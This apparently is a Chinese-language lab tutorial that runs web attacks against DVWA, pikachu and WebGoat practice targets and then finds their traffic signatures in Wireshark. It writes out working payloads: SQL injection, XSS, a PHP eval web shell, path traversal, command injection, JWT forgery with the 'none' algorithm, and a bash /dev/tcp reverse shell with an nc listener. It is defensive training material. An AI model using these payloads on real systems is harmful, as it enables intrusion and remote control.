web漏洞的攻击及抓取攻击流量

以dvwa靶场为例,使用wireshark抓取攻击流量,并定位关键字段

SQL注入

攻击

在sql注入攻击

1' and 1=2 union select version(),2#

web漏洞的攻击及抓取攻击流量_第1张图片

流量特征

在数据包中可以清晰的查看源IP和目的IP

在Wireshark选中Ethernet0网卡

  • 点击Submit,进行抓包

web漏洞的攻击及抓取攻击流量_第2张图片

  • 利用union select关键字开始抓包
  • 并在Wireshark中停止抓包

web漏洞的攻击及抓取攻击流量_第3张图片

  • 抓包成功

  • 查看目的ip地址的流量

ip.dst==192.168.63.138

web漏洞的攻击及抓取攻击流量_第4张图片

  • 成功找到union select关键字

web漏洞的攻击及抓取攻击流量_第5张图片

XSS

攻击

  • 注入XSS漏洞
<ScRiPt>alert(/xss/)</script>

web漏洞的攻击及抓取攻击流量_第6张图片

  • 注入成功

web漏洞的攻击及抓取攻击流量_第7张图片

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 并查找关键字script

web漏洞的攻击及抓取攻击流量_第8张图片

  • 成功找到script关键字

web漏洞的攻击及抓取攻击流量_第9张图片

文件上传

攻击

上传一句话木马文件

 @eval($_POST[777]);?>

web漏洞的攻击及抓取攻击流量_第10张图片

上传成功

web漏洞的攻击及抓取攻击流量_第11张图片

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 并查找后缀为.php的文件

web漏洞的攻击及抓取攻击流量_第12张图片

  • 成功找到1.php关键字
  • 可以看到1.php的内容

web漏洞的攻击及抓取攻击流量_第13张图片

文件包含

攻击

将url中page后的值改为file../../../../phpinfo.php

web漏洞的攻击及抓取攻击流量_第14张图片

web漏洞的攻击及抓取攻击流量_第15张图片

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 查找url的值为file../../../../phpinfo.php

web漏洞的攻击及抓取攻击流量_第16张图片

  • 查看目的ip地址的流量
ip.dst==192.168.63.141&&http

web漏洞的攻击及抓取攻击流量_第17张图片

  • 成功找到关键字file../../../../phpinfo.php

web漏洞的攻击及抓取攻击流量_第18张图片

文件读取

攻击

web漏洞的攻击及抓取攻击流量_第19张图片

将url中的值改为

file/../../../../../../../../../../windows\system32\drivers\etc\hosts

web漏洞的攻击及抓取攻击流量_第20张图片

读取成功

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 查找url的值为file../../../../../../../windows\system32\drivers\etc\hosts

web漏洞的攻击及抓取攻击流量_第21张图片

  • 查看目的ip地址的流量
ip.dst==192.168.63.141&&http

web漏洞的攻击及抓取攻击流量_第22张图片

成功找到关键字file../../../../../../../windows\system32\drivers\etc\hosts

web漏洞的攻击及抓取攻击流量_第23张图片

暴力破解

攻击

  • 输入用户名密码

web漏洞的攻击及抓取攻击流量_第24张图片

  • 用burp抓包

web漏洞的攻击及抓取攻击流量_第25张图片

爆破成功

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 利用burp的post进行抓取数据包

web漏洞的攻击及抓取攻击流量_第26张图片

  • 使用wireshark抓取数据包
  • 查看目的ip地址的流量
ip.dst==192.168.63.139&&http

web漏洞的攻击及抓取攻击流量_第27张图片

成功找到数据包的关键字

web漏洞的攻击及抓取攻击流量_第28张图片

命令执行

攻击

注入命令

ping 127.0.0.1 | whoami

web漏洞的攻击及抓取攻击流量_第29张图片

注入成功

web漏洞的攻击及抓取攻击流量_第30张图片

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 点击Submit,进行抓包

web漏洞的攻击及抓取攻击流量_第31张图片

  • 查看目的ip地址的流量
ip.dst==192.168.63.139

web漏洞的攻击及抓取攻击流量_第32张图片

成功找到数据包的关键字

web漏洞的攻击及抓取攻击流量_第33张图片

SSRF

以pikachu靶场为例

攻击

更改url后的值

web漏洞的攻击及抓取攻击流量_第34张图片

更改为http://www.baidu.com

image-20231208211215362

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 查找url的值为http://www.baidu.com

web漏洞的攻击及抓取攻击流量_第35张图片

成功找到数据包中的关键字

web漏洞的攻击及抓取攻击流量_第36张图片

shiro反序列化

攻击

利用kali的IP开始攻击

web漏洞的攻击及抓取攻击流量_第37张图片

成功找到cc链

web漏洞的攻击及抓取攻击流量_第38张图片

尝试命令执行

web漏洞的攻击及抓取攻击流量_第39张图片

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 点击Ethernet0
  • 执行

web漏洞的攻击及抓取攻击流量_第40张图片

  • 开始抓取流量

  • 并在Wireshark中停止抓包

image-20231208160727542

查看目的ip地址的流量

ip.dst==192.168.63.129

web漏洞的攻击及抓取攻击流量_第41张图片

  • 双击查看

  • 看到shiro反序列化的关键字rememberme=

web漏洞的攻击及抓取攻击流量_第42张图片

jwt

以WebGoat第4关靶场为例

攻击

首先登录Tom用户

web漏洞的攻击及抓取攻击流量_第43张图片

选择一个并开始投票,发现可以一致投票

web漏洞的攻击及抓取攻击流量_第44张图片

点击删除,提示只有admin用户才能清空

web漏洞的攻击及抓取攻击流量_第45张图片

利用bp开始抓包

web漏洞的攻击及抓取攻击流量_第46张图片

右击发送到Repeater

web漏洞的攻击及抓取攻击流量_第47张图片

将cookie的值利用进行JWT解码

web漏洞的攻击及抓取攻击流量_第48张图片

web漏洞的攻击及抓取攻击流量_第49张图片

利用base64编码,将HS512改为nonefalse改为true

web漏洞的攻击及抓取攻击流量_第50张图片

web漏洞的攻击及抓取攻击流量_第51张图片

分别将修改后的base64编码放在Encoded中

web漏洞的攻击及抓取攻击流量_第52张图片

将HEADER和PAYLOAD的Encoded放在bp的cookie中

web漏洞的攻击及抓取攻击流量_第53张图片

提示已经成功完成任务

web漏洞的攻击及抓取攻击流量_第54张图片

回到页面查看,删除成功

web漏洞的攻击及抓取攻击流量_第55张图片

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 利用burp的post进行抓取数据包

web漏洞的攻击及抓取攻击流量_第56张图片

  • 使用wireshark抓取数据包
  • 查看目的ip地址的流量
ip.dst==192.168.63.129&&http

web漏洞的攻击及抓取攻击流量_第57张图片

成功找到数据包中的关键字

web漏洞的攻击及抓取攻击流量_第58张图片

反弹shell

前提:

准备两台虚拟机(kali、linux)

攻击

首先是kali开启监听

nc -lvvp 5555

web漏洞的攻击及抓取攻击流量_第59张图片

Linux连接kali

bash -i >& /dev/tcp/192.168.63.129/5555 0>&1
          或
bash -c "bash -i >& /dev/tcp/192.168.63.129/5555 0>&1"
#bash -i >& /dev/tcp/攻击机IP/攻击机端口 0>&1

web漏洞的攻击及抓取攻击流量_第60张图片

监听成功

web漏洞的攻击及抓取攻击流量_第61张图片

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包中的cat /etc/passwd

web漏洞的攻击及抓取攻击流量_第62张图片

  • 查看目的ip地址的流量
ip.dst==192.168.63.129&&tcp
  • 成功抓到tcp数据流中的关键字

web漏洞的攻击及抓取攻击流量_第63张图片

你可能感兴趣的:(网络,服务器)